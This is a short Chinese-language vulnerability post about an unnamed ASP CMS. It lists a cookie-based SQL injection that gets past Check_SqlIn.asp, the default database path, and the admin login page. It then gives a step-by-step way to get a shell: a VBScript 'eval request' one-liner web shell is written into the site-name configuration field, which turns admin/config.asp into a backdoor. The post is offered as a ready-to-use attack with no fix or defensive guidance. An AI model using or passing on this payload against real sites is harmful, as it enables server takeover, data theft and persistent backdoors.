Author:mer4en7y
下午遇到这个CMS,于是看了看代码
Check_SqlIn.asp防注入代码未过滤完全注入漏洞:
1)未对cookie方式进行过滤,cookie注入
2)默认数据库:
data/article.mdb
3)后台拿shell:
后台地址:admin/login.asp
系统配置-->网站名称处写入:"<script language=VBScript runat=server>eval request("1")</script>"
一句话地址:http://www.XX.com /admin/config.asp
